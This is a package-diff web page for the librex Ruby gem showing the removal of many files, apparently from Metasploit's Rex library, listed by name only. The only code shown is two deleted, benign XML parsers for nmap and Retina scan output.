RubyGems - librex - Versions diffs - 0.0.13 → 0.0.15 - Mend

librex 0.0.13 → 0.0.15

Files changed (435) hide show

data/README.markdown +1 -1
data/Rakefile +1 -0
metadata +3 -435
data/lib/rex/LICENSE +0 -29
data/lib/rex/arch.rb +0 -103
data/lib/rex/arch/sparc.rb +0 -75
data/lib/rex/arch/sparc.rb.ut.rb +0 -18
data/lib/rex/arch/x86.rb +0 -513
data/lib/rex/arch/x86.rb.ut.rb +0 -93
data/lib/rex/assembly/nasm.rb +0 -104
data/lib/rex/assembly/nasm.rb.ut.rb +0 -22
data/lib/rex/codepage.map +0 -104
data/lib/rex/compat.rb +0 -311
data/lib/rex/constants.rb +0 -113
data/lib/rex/elfparsey.rb +0 -11
data/lib/rex/elfparsey/elf.rb +0 -123
data/lib/rex/elfparsey/elfbase.rb +0 -258
data/lib/rex/elfparsey/exceptions.rb +0 -27
data/lib/rex/elfscan.rb +0 -12
data/lib/rex/elfscan/scanner.rb +0 -207
data/lib/rex/elfscan/search.rb +0 -46
data/lib/rex/encoder/alpha2.rb +0 -31
data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -68
data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -79
data/lib/rex/encoder/alpha2/generic.rb +0 -114
data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -117
data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -129
data/lib/rex/encoder/ndr.rb +0 -89
data/lib/rex/encoder/ndr.rb.ut.rb +0 -44
data/lib/rex/encoder/nonalpha.rb +0 -61
data/lib/rex/encoder/nonupper.rb +0 -64
data/lib/rex/encoder/xdr.rb +0 -106
data/lib/rex/encoder/xdr.rb.ut.rb +0 -29
data/lib/rex/encoder/xor.rb +0 -69
data/lib/rex/encoder/xor/dword.rb +0 -13
data/lib/rex/encoder/xor/dword_additive.rb +0 -13
data/lib/rex/encoders/xor_dword.rb +0 -35
data/lib/rex/encoders/xor_dword_additive.rb +0 -53
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -12
data/lib/rex/encoding/xor.rb +0 -20
data/lib/rex/encoding/xor.rb.ts.rb +0 -14
data/lib/rex/encoding/xor/byte.rb +0 -15
data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -21
data/lib/rex/encoding/xor/dword.rb +0 -21
data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -15
data/lib/rex/encoding/xor/dword_additive.rb +0 -92
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -15
data/lib/rex/encoding/xor/exceptions.rb +0 -17
data/lib/rex/encoding/xor/generic.rb +0 -146
data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -120
data/lib/rex/encoding/xor/qword.rb +0 -15
data/lib/rex/encoding/xor/word.rb +0 -21
data/lib/rex/encoding/xor/word.rb.ut.rb +0 -13
data/lib/rex/exceptions.rb +0 -275
data/lib/rex/exceptions.rb.ut.rb +0 -44
data/lib/rex/exploitation/cmdstager.rb +0 -9
data/lib/rex/exploitation/cmdstager/base.rb +0 -175
data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -142
data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -136
data/lib/rex/exploitation/cmdstager/tftp.rb +0 -63
data/lib/rex/exploitation/cmdstager/vbs.rb +0 -128
data/lib/rex/exploitation/egghunter.rb +0 -277
data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -25
data/lib/rex/exploitation/encryptjs.rb +0 -77
data/lib/rex/exploitation/heaplib.js.b64 +0 -331
data/lib/rex/exploitation/heaplib.rb +0 -94
data/lib/rex/exploitation/javascriptosdetect.rb +0 -897
data/lib/rex/exploitation/obfuscatejs.rb +0 -335
data/lib/rex/exploitation/omelet.rb +0 -320
data/lib/rex/exploitation/omelet.rb.ut.rb +0 -13
data/lib/rex/exploitation/opcodedb.rb +0 -818
data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -279
data/lib/rex/exploitation/seh.rb +0 -92
data/lib/rex/exploitation/seh.rb.ut.rb +0 -19
data/lib/rex/file.rb +0 -112
data/lib/rex/file.rb.ut.rb +0 -16
data/lib/rex/image_source.rb +0 -12
data/lib/rex/image_source/disk.rb +0 -60
data/lib/rex/image_source/image_source.rb +0 -46
data/lib/rex/image_source/memory.rb +0 -37
data/lib/rex/io/bidirectional_pipe.rb +0 -157
data/lib/rex/io/datagram_abstraction.rb +0 -35
data/lib/rex/io/stream.rb +0 -319
data/lib/rex/io/stream_abstraction.rb +0 -197
data/lib/rex/io/stream_server.rb +0 -211
data/lib/rex/job_container.rb +0 -187
data/lib/rex/logging.rb +0 -4
data/lib/rex/logging/log_dispatcher.rb +0 -179
data/lib/rex/logging/log_sink.rb +0 -42
data/lib/rex/logging/sinks/flatfile.rb +0 -55
data/lib/rex/logging/sinks/stderr.rb +0 -43
data/lib/rex/machparsey.rb +0 -9
data/lib/rex/machparsey/exceptions.rb +0 -34
data/lib/rex/machparsey/mach.rb +0 -209
data/lib/rex/machparsey/machbase.rb +0 -408
data/lib/rex/machscan.rb +0 -9
data/lib/rex/machscan/scanner.rb +0 -217
data/lib/rex/mime.rb +0 -9
data/lib/rex/mime/header.rb +0 -77
data/lib/rex/mime/message.rb +0 -144
data/lib/rex/mime/part.rb +0 -20
data/lib/rex/nop/opty2.rb +0 -108
data/lib/rex/nop/opty2.rb.ut.rb +0 -23
data/lib/rex/nop/opty2_tables.rb +0 -300
data/lib/rex/ole.rb +0 -205
data/lib/rex/ole/clsid.rb +0 -47
data/lib/rex/ole/difat.rb +0 -141
data/lib/rex/ole/directory.rb +0 -231
data/lib/rex/ole/direntry.rb +0 -240
data/lib/rex/ole/docs/dependencies.txt +0 -8
data/lib/rex/ole/docs/references.txt +0 -1
data/lib/rex/ole/fat.rb +0 -99
data/lib/rex/ole/header.rb +0 -204
data/lib/rex/ole/minifat.rb +0 -77
data/lib/rex/ole/propset.rb +0 -144
data/lib/rex/ole/samples/create_ole.rb +0 -27
data/lib/rex/ole/samples/dir.rb +0 -35
data/lib/rex/ole/samples/dump_stream.rb +0 -34
data/lib/rex/ole/samples/ole_info.rb +0 -23
data/lib/rex/ole/storage.rb +0 -395
data/lib/rex/ole/stream.rb +0 -53
data/lib/rex/ole/substorage.rb +0 -49
data/lib/rex/ole/util.rb +0 -157
data/lib/rex/parser/arguments.rb +0 -97
data/lib/rex/parser/arguments.rb.ut.rb +0 -67
data/lib/rex/parser/ini.rb +0 -185
data/lib/rex/parser/ini.rb.ut.rb +0 -29
data/lib/rex/parser/ip360_aspl_xml.rb +0 -102
data/lib/rex/parser/ip360_xml.rb +0 -93
data/lib/rex/parser/nessus_xml.rb +0 -118
data/lib/rex/parser/netsparker_xml.rb +0 -94
data/lib/rex/parser/nexpose_xml.rb +0 -131
data/lib/rex/parser/nmap_xml.rb +0 -121
data/lib/rex/parser/retina_xml.rb +0 -109
data/lib/rex/payloads.rb +0 -1
data/lib/rex/payloads/win32.rb +0 -2
data/lib/rex/payloads/win32/common.rb +0 -26
data/lib/rex/payloads/win32/kernel.rb +0 -53
data/lib/rex/payloads/win32/kernel/common.rb +0 -54
data/lib/rex/payloads/win32/kernel/migration.rb +0 -12
data/lib/rex/payloads/win32/kernel/recovery.rb +0 -50
data/lib/rex/payloads/win32/kernel/stager.rb +0 -194
data/lib/rex/peparsey.rb +0 -12
data/lib/rex/peparsey/exceptions.rb +0 -32
data/lib/rex/peparsey/pe.rb +0 -212
data/lib/rex/peparsey/pe_memdump.rb +0 -63
data/lib/rex/peparsey/pebase.rb +0 -1680
data/lib/rex/peparsey/section.rb +0 -136
data/lib/rex/pescan.rb +0 -13
data/lib/rex/pescan/analyze.rb +0 -309
data/lib/rex/pescan/scanner.rb +0 -206
data/lib/rex/pescan/search.rb +0 -56
data/lib/rex/platforms.rb +0 -1
data/lib/rex/platforms/windows.rb +0 -51
data/lib/rex/poly.rb +0 -132
data/lib/rex/poly/block.rb +0 -477
data/lib/rex/poly/register.rb +0 -100
data/lib/rex/poly/register/x86.rb +0 -40
data/lib/rex/post.rb +0 -8
data/lib/rex/post/dir.rb +0 -51
data/lib/rex/post/file.rb +0 -172
data/lib/rex/post/file_stat.rb +0 -220
data/lib/rex/post/gen.pl +0 -13
data/lib/rex/post/io.rb +0 -182
data/lib/rex/post/meterpreter.rb +0 -4
data/lib/rex/post/meterpreter/channel.rb +0 -445
data/lib/rex/post/meterpreter/channel_container.rb +0 -54
data/lib/rex/post/meterpreter/channels/pool.rb +0 -160
data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -62
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -103
data/lib/rex/post/meterpreter/channels/stream.rb +0 -87
data/lib/rex/post/meterpreter/client.rb +0 -364
data/lib/rex/post/meterpreter/client_core.rb +0 -274
data/lib/rex/post/meterpreter/dependencies.rb +0 -3
data/lib/rex/post/meterpreter/extension.rb +0 -32
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -58
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -16
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -94
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -21
data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +0 -57
data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +0 -15
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -118
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -61
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -111
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -28
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +0 -101
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +0 -26
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -333
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -282
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +0 -266
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -103
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -48
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -144
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -73
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -56
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +0 -137
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +0 -180
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -167
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +0 -208
data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -6
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +0 -38106
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -31
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +0 -47
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -36
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +0 -1818
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +0 -96
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +0 -3848
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +0 -26
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +0 -153
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +0 -21
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +0 -3169
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +0 -599
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +0 -318
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +0 -100
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -42
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +0 -148
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -127
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +0 -309
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +0 -204
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +0 -51
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +0 -630
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +0 -75
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -103
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +0 -149
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -97
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -192
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -41
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -61
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -370
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -129
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -55
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -336
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -141
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -279
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -193
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -102
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -180
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +0 -211
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -227
data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +0 -63
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -30
data/lib/rex/post/meterpreter/object_aliases.rb +0 -83
data/lib/rex/post/meterpreter/packet.rb +0 -688
data/lib/rex/post/meterpreter/packet_dispatcher.rb +0 -431
data/lib/rex/post/meterpreter/packet_parser.rb +0 -94
data/lib/rex/post/meterpreter/packet_response_waiter.rb +0 -83
data/lib/rex/post/meterpreter/ui/console.rb +0 -137
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -62
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +0 -730
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -108
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -241
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +0 -231
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -61
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -98
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -51
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -132
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +0 -187
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -65
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +0 -442
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +0 -298
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -486
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -315
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +0 -157
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -95
data/lib/rex/post/permission.rb +0 -26
data/lib/rex/post/process.rb +0 -57
data/lib/rex/post/thread.rb +0 -57
data/lib/rex/post/ui.rb +0 -52
data/lib/rex/proto.rb +0 -13
data/lib/rex/proto.rb.ts.rb +0 -8
data/lib/rex/proto/dcerpc.rb +0 -6
data/lib/rex/proto/dcerpc.rb.ts.rb +0 -9
data/lib/rex/proto/dcerpc/client.rb +0 -361
data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -491
data/lib/rex/proto/dcerpc/exceptions.rb +0 -150
data/lib/rex/proto/dcerpc/handle.rb +0 -47
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -85
data/lib/rex/proto/dcerpc/ndr.rb +0 -72
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -41
data/lib/rex/proto/dcerpc/packet.rb +0 -253
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -56
data/lib/rex/proto/dcerpc/response.rb +0 -187
data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -15
data/lib/rex/proto/dcerpc/uuid.rb +0 -84
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -46
data/lib/rex/proto/dhcp.rb +0 -7
data/lib/rex/proto/dhcp/constants.rb +0 -33
data/lib/rex/proto/dhcp/server.rb +0 -292
data/lib/rex/proto/drda.rb +0 -5
data/lib/rex/proto/drda.rb.ts.rb +0 -17
data/lib/rex/proto/drda/constants.rb +0 -49
data/lib/rex/proto/drda/constants.rb.ut.rb +0 -23
data/lib/rex/proto/drda/packet.rb +0 -252
data/lib/rex/proto/drda/packet.rb.ut.rb +0 -109
data/lib/rex/proto/drda/utils.rb +0 -123
data/lib/rex/proto/drda/utils.rb.ut.rb +0 -84
data/lib/rex/proto/http.rb +0 -5
data/lib/rex/proto/http.rb.ts.rb +0 -12
data/lib/rex/proto/http/client.rb +0 -821
data/lib/rex/proto/http/client.rb.ut.rb +0 -95
data/lib/rex/proto/http/handler.rb +0 -46
data/lib/rex/proto/http/handler/erb.rb +0 -128
data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -21
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
data/lib/rex/proto/http/handler/proc.rb +0 -60
data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -24
data/lib/rex/proto/http/header.rb +0 -161
data/lib/rex/proto/http/header.rb.ut.rb +0 -46
data/lib/rex/proto/http/packet.rb +0 -407
data/lib/rex/proto/http/packet.rb.ut.rb +0 -165
data/lib/rex/proto/http/request.rb +0 -356
data/lib/rex/proto/http/request.rb.ut.rb +0 -214
data/lib/rex/proto/http/response.rb +0 -90
data/lib/rex/proto/http/response.rb.ut.rb +0 -149
data/lib/rex/proto/http/server.rb +0 -369
data/lib/rex/proto/http/server.rb.ut.rb +0 -79
data/lib/rex/proto/ntlm.rb +0 -7
data/lib/rex/proto/ntlm.rb.ut.rb +0 -177
data/lib/rex/proto/ntlm/base.rb +0 -326
data/lib/rex/proto/ntlm/constants.rb +0 -74
data/lib/rex/proto/ntlm/crypt.rb +0 -415
data/lib/rex/proto/ntlm/exceptions.rb +0 -9
data/lib/rex/proto/ntlm/message.rb +0 -533
data/lib/rex/proto/ntlm/utils.rb +0 -763
data/lib/rex/proto/proxy/socks4a.rb +0 -440
data/lib/rex/proto/rfb.rb +0 -19
data/lib/rex/proto/rfb.rb.ut.rb +0 -37
data/lib/rex/proto/rfb/cipher.rb +0 -84
data/lib/rex/proto/rfb/client.rb +0 -207
data/lib/rex/proto/rfb/constants.rb +0 -52
data/lib/rex/proto/smb.rb +0 -7
data/lib/rex/proto/smb.rb.ts.rb +0 -8
data/lib/rex/proto/smb/client.rb +0 -1952
data/lib/rex/proto/smb/client.rb.ut.rb +0 -223
data/lib/rex/proto/smb/constants.rb +0 -1047
data/lib/rex/proto/smb/constants.rb.ut.rb +0 -18
data/lib/rex/proto/smb/crypt.rb +0 -36
data/lib/rex/proto/smb/evasions.rb +0 -66
data/lib/rex/proto/smb/exceptions.rb +0 -858
data/lib/rex/proto/smb/simpleclient.rb +0 -306
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -128
data/lib/rex/proto/smb/utils.rb +0 -103
data/lib/rex/proto/smb/utils.rb.ut.rb +0 -20
data/lib/rex/proto/sunrpc.rb +0 -1
data/lib/rex/proto/sunrpc/client.rb +0 -195
data/lib/rex/proto/tftp.rb +0 -12
data/lib/rex/proto/tftp/constants.rb +0 -39
data/lib/rex/proto/tftp/server.rb +0 -497
data/lib/rex/proto/tftp/server.rb.ut.rb +0 -28
data/lib/rex/script.rb +0 -42
data/lib/rex/script/base.rb +0 -59
data/lib/rex/script/meterpreter.rb +0 -15
data/lib/rex/script/shell.rb +0 -9
data/lib/rex/service.rb +0 -48
data/lib/rex/service_manager.rb +0 -141
data/lib/rex/service_manager.rb.ut.rb +0 -32
data/lib/rex/services/local_relay.rb +0 -423
data/lib/rex/socket.rb +0 -684
data/lib/rex/socket.rb.ut.rb +0 -107
data/lib/rex/socket/comm.rb +0 -119
data/lib/rex/socket/comm/local.rb +0 -412
data/lib/rex/socket/comm/local.rb.ut.rb +0 -75
data/lib/rex/socket/ip.rb +0 -130
data/lib/rex/socket/parameters.rb +0 -345
data/lib/rex/socket/parameters.rb.ut.rb +0 -51
data/lib/rex/socket/range_walker.rb +0 -346
data/lib/rex/socket/range_walker.rb.ut.rb +0 -55
data/lib/rex/socket/ssl_tcp.rb +0 -184
data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -39
data/lib/rex/socket/ssl_tcp_server.rb +0 -122
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -61
data/lib/rex/socket/subnet_walker.rb +0 -75
data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -28
data/lib/rex/socket/switch_board.rb +0 -278
data/lib/rex/socket/switch_board.rb.ut.rb +0 -52
data/lib/rex/socket/tcp.rb +0 -76
data/lib/rex/socket/tcp.rb.ut.rb +0 -64
data/lib/rex/socket/tcp_server.rb +0 -67
data/lib/rex/socket/tcp_server.rb.ut.rb +0 -44
data/lib/rex/socket/udp.rb +0 -164
data/lib/rex/socket/udp.rb.ut.rb +0 -44
data/lib/rex/struct2.rb +0 -5
data/lib/rex/struct2/c_struct.rb +0 -181
data/lib/rex/struct2/c_struct_template.rb +0 -39
data/lib/rex/struct2/constant.rb +0 -26
data/lib/rex/struct2/element.rb +0 -44
data/lib/rex/struct2/generic.rb +0 -73
data/lib/rex/struct2/restraint.rb +0 -54
data/lib/rex/struct2/s_string.rb +0 -72
data/lib/rex/struct2/s_struct.rb +0 -111
data/lib/rex/sync.rb +0 -6
data/lib/rex/sync/event.rb +0 -94
data/lib/rex/sync/read_write_lock.rb +0 -176
data/lib/rex/sync/ref.rb +0 -57
data/lib/rex/sync/thread_safe.rb +0 -82
data/lib/rex/test.rb +0 -35
data/lib/rex/text.rb +0 -1149
data/lib/rex/text.rb.ut.rb +0 -190
data/lib/rex/thread_factory.rb +0 -42
data/lib/rex/time.rb +0 -65
data/lib/rex/transformer.rb +0 -115
data/lib/rex/transformer.rb.ut.rb +0 -38
data/lib/rex/ui.rb +0 -21
data/lib/rex/ui/interactive.rb +0 -254
data/lib/rex/ui/output.rb +0 -78
data/lib/rex/ui/output/none.rb +0 -18
data/lib/rex/ui/progress_tracker.rb +0 -96
data/lib/rex/ui/subscriber.rb +0 -149
data/lib/rex/ui/text/color.rb +0 -97
data/lib/rex/ui/text/color.rb.ut.rb +0 -18
data/lib/rex/ui/text/dispatcher_shell.rb +0 -467
data/lib/rex/ui/text/input.rb +0 -117
data/lib/rex/ui/text/input/buffer.rb +0 -75
data/lib/rex/ui/text/input/readline.rb +0 -129
data/lib/rex/ui/text/input/socket.rb +0 -95
data/lib/rex/ui/text/input/stdio.rb +0 -45
data/lib/rex/ui/text/irb_shell.rb +0 -57
data/lib/rex/ui/text/output.rb +0 -80
data/lib/rex/ui/text/output/buffer.rb +0 -61
data/lib/rex/ui/text/output/file.rb +0 -43
data/lib/rex/ui/text/output/socket.rb +0 -43
data/lib/rex/ui/text/output/stdio.rb +0 -40
data/lib/rex/ui/text/progress_tracker.rb +0 -56
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -34
data/lib/rex/ui/text/shell.rb +0 -328
data/lib/rex/ui/text/table.rb +0 -279
data/lib/rex/ui/text/table.rb.ut.rb +0 -55
data/lib/rex/zip.rb +0 -93
data/lib/rex/zip/archive.rb +0 -184
data/lib/rex/zip/blocks.rb +0 -182
data/lib/rex/zip/entry.rb +0 -104
data/lib/rex/zip/samples/comment.rb +0 -32
data/lib/rex/zip/samples/mkwar.rb +0 -138
data/lib/rex/zip/samples/mkzip.rb +0 -19
data/lib/rex/zip/samples/recursive.rb +0 -58

data/lib/rex/parser/nmap_xml.rb DELETED Viewed

@@ -1,121 +0,0 @@
-require 'rexml/document'
-module Rex
-module Parser
-#
-# Stream parser for nmap -oX xml output
-#
-# Yields a hash representing each host found in the xml stream.  Each host
-# will look something like the following:
-#	{
-#		"status" => "up",
-#		"addrs"  => { "ipv4" => "192.168.0.1", "mac" => "00:0d:87:a1:df:72" },
-#		"ports"  => [
-#			{ "portid" => "22", "state" => "closed", ... },
-#			{ "portid" => "80", "state" => "open", ... },
-#			...
-#		]
-#	}
-#
-# Usage:
-# <tt>
-# parser = NmapXMLStreamParser.new { |host|
-#	# do stuff with the host
-# }
-# REXML::Document.parse_stream(File.new(nmap_xml), parser)
-# </tt>
-# -- or --
-# <tt>
-# parser = NmapXMLStreamParser.new
-# parser.on_found_host = Proc.new { |host|
-#	# do stuff with the host
-# }
-# REXML::Document.parse_stream(File.new(nmap_xml), parser)
-# </tt>
-#
-# This parser does not maintain state as well as a tree parser, so malformed
-# xml will trip it up.  Nmap shouldn't ever output malformed xml, so it's not
-# a big deal.
-#
-class NmapXMLStreamParser
-	attr_accessor :on_found_host
-	def initialize(&block)
-		reset_state
-		on_found_host = block if block
-	end
-	def reset_state
-		@host = { "status" => nil, "addrs" => {}, "ports" => [] }
-	end
-	def tag_start(name, attributes)
-		case name
-		when "address"
-			@host["addrs"][attributes["addrtype"]] = attributes["addr"]
-			if (attributes["addrtype"] =~ /ipv[46]/)
-				@host["addr"] = attributes["addr"]
-			end
-		when "osclass"
-			@host["os_vendor"]   = attributes["vendor"]
-			@host["os_family"]   = attributes["osfamily"]
-			@host["os_version"]  = attributes["osgen"]
-			@host["os_accuracy"] = attributes["accuracy"]
-		when "osmatch"
-			if(attributes["accuracy"].to_i == 100)
-				@host["os_match"] = attributes["name"]
-			end
-		when "uptime"
-			@host["last_boot"]   = attributes["lastboot"]
-		when "hostname"
-			if(attributes["type"] == "PTR")
-				@host["reverse_dns"] = attributes["name"]
-			end
-		when "status"
-			# <status> refers to the liveness of the host; values are "up" or "down"
-			@host["status"] = attributes["state"]
-			@host["status_reason"] = attributes["reason"]
-		when "port"
-			@host["ports"].push(attributes)
-		when "state"
-			# <state> refers to the state of a port; values are "open", "closed", or "filtered"
-			@host["ports"].last["state"] = attributes["state"]
-		when "service"
-			# Store any service and script info with the associated port.  There shouldn't
-			# be any collisions on attribute names here, so just merge them.
-			@host["ports"].last.merge!(attributes)
-		when "script"
-			@host["ports"].last["scripts"] ||= {}
-			@host["ports"].last["scripts"][attributes["id"]] = attributes["output"]
-		when "trace"
-			@host["trace"] = {"port" => attributes["port"], "proto" => attributes["proto"], "hops" => [] }
-		when "hop"
-			if @host["trace"]
-				@host["trace"]["hops"].push(attributes)
-			end
-		end
-	end
-	def tag_end(name)
-		case name
-		when "host"
-			on_found_host.call(@host) if on_found_host
-			reset_state
-		end
-	end
-	# We don't need these methods, but they're necessary to keep REXML happy
-	def text(str); end
-	def xmldecl(version, encoding, standalone); end
-	def cdata; end
-	def comment(str); end
-	def instruction(name, instruction); end
-	def attlist; end
-end
-end
-end

data/lib/rex/parser/retina_xml.rb DELETED Viewed

@@ -1,109 +0,0 @@
-module Rex
-module Parser
-# XXX - Retina XML does not include ANY service/port information export
-class RetinaXMLStreamParser
-	attr_accessor :on_found_host
-	def initialize(on_found_host = nil)
-		reset_state
-		self.on_found_host = on_found_host if on_found_host
-	end
-	def reset_state
-		@state = :generic_state
-		@host  = { 'vulns' => [] }
-		reset_audit_state
-	end
-	def reset_audit_state
-		@audit = { 'refs' => [] }
-	end
-	def tag_start(name, attributes)
-		@state = "in_#{name.downcase}".intern
-	end
-	def text(str)
-		case @state
-		when :in_ip
-			@host["address"] = str
-		when :in_dnsname
-			@host["hostname"] = str.split(/\s+/).first
-		when :in_netbiosname
-			@host["netbios"] = str
-		when :in_mac
-			@host["mac"] = str
-		when :in_os
-			@host["os"] = str
-		when :in_rthid
-			@audit['refs'].push(['RETINA', str])
-		when :in_cve
-			str.split(",").each do |cve|
-				cve = cve.to_s.strip
-				next if cve.empty?
-				pre,val = cve.split('-', 2)
-				next if not val
-				next if pre != "CVE"
-				@audit['refs'].push( ['CVE', val] )
-			end
-		when :in_name
-			@audit['name'] = str
-		when :in_description
-			@audit['description'] = str
-		when :in_risk
-			@audit['risk'] = str
-		when :in_cce
-			@audit['cce'] = str
-		when :in_date
-			@audit['data'] = str
-		end
-	end
-	def tag_end(name)
-		case name
-		when "host"
-			on_found_host.call(@host) if on_found_host
-			reset_state
-		when "audit"
-			@host['vulns'].push @audit
-			reset_audit_state
-		end
-	end
-	# We don't need these methods, but they're necessary to keep REXML happy
-	def xmldecl(version, encoding, standalone); end
-	def cdata; end
-	def comment(str); end
-	def instruction(name, instruction); end
-	def attlist; end
-end
-end
-end
-__END__
-<scanJob>
